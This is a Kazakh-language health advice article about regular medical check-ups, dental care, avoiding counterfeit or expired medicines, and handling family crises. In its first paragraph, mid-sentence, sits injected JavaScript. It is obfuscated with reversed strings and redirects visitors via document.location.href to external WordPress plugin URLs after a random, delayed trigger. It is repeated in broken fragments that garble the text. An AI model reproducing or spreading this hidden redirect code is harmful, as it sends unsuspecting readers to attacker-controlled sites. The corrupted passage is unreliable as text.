2024-07-27

Денсаулық,денсаулық және денсаулық

Көп айтылатын сөз. Аса маңызды болғандығынан. Денсаулыққа қатысты да айтуға болады. Мынадай қызық дерекке назар салыңыз. Ресейлік ғылым академиясы әлеуметтану Институтының  2008 жылы жүргізген зерттеулерінде « сізді толғандыратын не?» деген сұраққа жауап берген азаSport$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/Sport.jpg» width=»76″ height=»106″ />маттардың  67 пайызы өзіммен ,туыстарымның денсаулығы деп жауап берген екен. Ақшамнан айрылып қаламын –ау деп алаңдағандардың саны бар болғаны 14 пайызды құраған. Біз көп жағдайда замандастарымызда «ақшаға есі шығып кеткен» деп жазғырып жатамыз. Олай емес екен. Денсаулық қашан да қымбат. Дәл қазіргідей алмағайып заманда да.

 Сонымен өз денсаулығымызға қалай қамқор болуға болады?
Сіздің табиғатыңыз қандай уаруға бейім, алдымен осыны біліп алу керек. Бұл үшін ата-бабңыз қандай аурудан қайтыс болған, әке-шешеңізді қандай аурулар көп мазалайды, осыны бір сүзгіден өткізіп алыңыз. Әрине, тұқым қуалайтын аурулармен күресу қиынырақ, бірақ, жаңашылдығымен таңқалдырып жүрген жапондықтар мұндай қауіптің алдын тұрақты түрде дәрігерлік тексеруден  өтіп тұру арқылы алады екен.
 Мерзімді дәрігерлік тексеруден өту сіздің денсаулығыңыздың сақтаудың ғана емес, ұзақ өмір сүруіңіздің де кепілі болып табылады. Медициналық статистика көрсетіп отырғандай  негізінен уақытысында анықталмаған  аурулардың соңы емге дес бермей, өліммен аяқталады. Ауру асқынып кетсе, амал жоқ. Осыған назар аударған «адамның денсаулығын ұлттың құндылығы» санайтын өркениетті елдерде халықтың белгіленген мерзім ішінде міндетті түрде дәрігерлік тексеруден өтуі үшін ынталандыру шаралары қаралады. Мәселен Германияда егер сіз белгіленген уақытта тіс дәрігерінің тексеруінен өтпеген болсаңыз, ауырған тісіңізді тегін емдемейді. Ақы төлейсіз. Өзінен-өзі түсінікті жайт, ақы төлемеу үшін мерзімді тексеруді ертеңге қалдырмайсыз.Өкінішке орай біздің елде тіс дәрігерінің қызметі тегін емес, әрі мұндай жүйе қалыптаспаған. Сондықтан да өз қамыңызды өзіңіз жеуге тура келеді.
ЕҢ АЛДЫМЕН ӨЗГЕНІҢ ЕМЕС ӨЗ ДЕНСАУЛЫҒЫҢЫЗДЫ ҚАМҚОРЛЫҚҚА АЛЫҢЫЗ.
 Егер бір жеріңіздің ауырып жүргенін байқадыңыз ба, дәрігерге бүгін барыңыз, ертең еміңіз үшін екі есе қымбат төлейсіз.Жаман айтпай, жақсы жоқ, ертең жұмыссыз, ақшасыз қалып кетсеңіз денсаулықты қайдан аласыз. Алдымен тістен бастаңыз, өйткені ауыз біздің қымбат ағзамыздың қақпасы. Ертеңге қалдырмаңыз, тіс емдеу күн өткен сайын қымбаттама, арзандамайды. Олай болатыны тісті сапалы емдеу үшін шетелдік материалдар қолданылады.
  Сізге қажет дәрілер арзан бағамен сатылатын дәріхананы тауып алыңыз, бірақ міндетті түрде дәрінің сапасына кепілдік болсын. Себебі кейбір жалған дәрілерді сырт келбетіне қарап,сапалысынан ажырату қиын. Дәрі салынған қораптар мен басқа да орамдар сапалы материалдардан жасалынғанына назар аударыңыз, қорғаныш жапсырмалары жақсылап тартылған, тігістері  ойқыш-ойқыш емес білінер-білінбес болуы керек. Ал, қауіпті препараттар салынған құтылар міндетті түрде балалар ғана емес өзіңіз ойланып барып аша алатындай құпиясы  бар қақпақшалармен жабылуға тиіс. Халықаралық стандарттарға сай дайындалған дәрілердің құтысы дәл осындай болады. Ал, егер құты оңай ашылатын болса, мұндай препараттардың «шығу тегі» күмән туғызады.
 Жаңалықтардан байқап жүргеніміздей кризис уақытында жалған дәрілер ғана емес, пайдалану мерзімі өтіп кеткен дәрі-дәрмекті сату жағдайлары да көбірек кездеседі. Сондықтан  алатын препаратыңыздың пайдалану мерзіміне мұқият зер салыңыз. Бір күнде болса, мерзімі өткен дәріні мүлдем пайдалануға болмайды! Егер күмәнді болсаңыз дәрі сатушыдан сапа сертификаты мен фармакологиялық тексеру қорытындысын талап етіңіз. Дәріханада мұндай құжаттарды көрсетуге міндетті. Дәрі-дәрмекті әр дүкеннің бұрыш-бұрышында көшіп-қонып жүретін кішігірім сату орындары немесе қолдан сатып алуға әдеттенбеңіз. Тіпті тым арзан болса да, бұл қауіпті!
 Теледидар мен газеттерде жарнамасы «жарқырап» жүріп жатқан дәріні көре салып, менің дертімнің дауасы екен деп жүгіріп барып сатып алудан да сақтаныңыз, алдымен өз дәрігеріңізбен болмаса жақсы таныс фармацевт маманмен ақылдасып, кеңесін алыңыз. Себебі, ауруды басатын жаңа препараттардың құрамында қауіпті наркотикалық заттардың болуы , оны сіз әлгі дәрісіз тұра алмайтын жағдайға жеткенде білуіңіз де ғажап емес.
 Тағы бір ескеретін жайт, экология. Қандай ауамен тыныс алып жүрсіз? Егер мүмкіндігіңіз болса,тұрмысқа лайықталған  радиациалық бақылау құралын, судың сапасын анықтайтын құрылғыларды алып қойғаныңыз артық емес. Аурудың алдын –алу шаралары, барлық уақытта оны емдеуден арзанға түседі.
 Ғасырлардың сүзгісінен өткен халықтық медицинаға да иек артуыңызға болады. Бірақ емші –тәуіп бұрын да аз емес еді, кризисте олардың саны арта түседі, алаяғына ұрынып қалып жүрмеңіз.
 Өмір болған соң қиын сәттердің кезігетіні заңдылық. Сары уайымға салынып, болмаса дегбірсізденіп жаныңыздағылардың да өзіңіздің де тәсіріңізді алып мазасыздануға жол беріп алмаңыз. Бірінші кезекті сіздің мәселені өзгертіп жіберуге күшіңіз жете ме, жоқ па осыған көз жеткізіңіз. Сіздің қолыңызда тұрған нәрсе емес екен, қатардағы пенде екеніңізді еске түсіріп сабыр сақтаңыз.
  Қандай да бір жағдай болмасын, жұмыссыз қалдыңыз ба, басқа ма, отбасының ортасына салып шешіңіз. Жасыруға болмайды. Аталарымыз «келісіп пішкен тон келте емес» дегенді жайдан-жай айта салмаған. Отбасындағыларды қиындау жағдайдың туғанынан хабардар етіп, кездесуі мүмкін жайттарға дайындық жасаңыз. Мұндай кездерде сіздің іскерлігіңіз сынға түседі. Өміріңіздегі «дағдарыстан» шығудың енді отбасылық экономика аясында жоспарын құруға тура келеді. Үкіметтегілер сияқты. Бұл дағдарыс  мемлекетті болмаса  үкіметтегілерді ғана сынауға емес, әрбірімізді соның ішінде Сіздің де өмірге бейіміңізді сынауға келді. Биліктің дағдарыстағы әрекетіне сын көзбен қараған сияқты Өзіңізге де сын көзбен қарай аласыз ба? Мәселе осында!
 Тағы бір ескеретін жайт, отбасылық дағдарыстан шығудың жолдарын отбасы мүшелерімен бірге талқылап, шешімді брге қабылдаған жөн.  Бұл жерде отбасылық істің ілгерілеуіне ұжымдық жауапкершілік қалыптасады. Кез-келген ұсынысты отбасылық қарым-қатынасқа қаупі жоқ па осы тұрғыдан  қарау керек. Сіз жалақысы көп жұмыс тапты делік, бірақ үйге шаршағаннан сүрініп кеп құлайсыз немесе айлап іс сапарда жүресіз, ал сіздің балаңыз  әкем болмаса шешемнің  менің не істеп жүргеніммен ісі жоқ оған бәрібір деп оқуын тастап кетті делік, болмаса осы тектес басқа да жағдай орын алды. Мұндай жағдайда не істейсіз? Сіз тауып жүрген жалақы үміт күтіп отырған ұлыңыздың болашағынан артық па, ойлануға тура келеді.
 Есіңізде болсын, әр отбасы мүшесінің денсаулығын ешқандай құндылықтармен салыстыруға болмайды. Сондықтан да өзіңізді де, отбасы мүшелерін де денсаулығына мұқият болуға тәрбиелеңіз. Бос нәрсеге бас ауырта бермеңіз. Туыстарыңыз бен жақындарыңыздың арасындағы дау-дамайды уақытында шешіп отырыңыз. Қайта отбасыңыз, туыстарыңыз, достарыңыздың басын жиі қосып, балалық,жастық шақты, жақсы күндерді еске түсіріп, сүйікті әндеріңізді әуелетіңздер. Бірге армандаңыздар, сізде БӘРІ ЖАҚСЫ БОЛАДЫ{jcomments on}

Яндекс.Метрика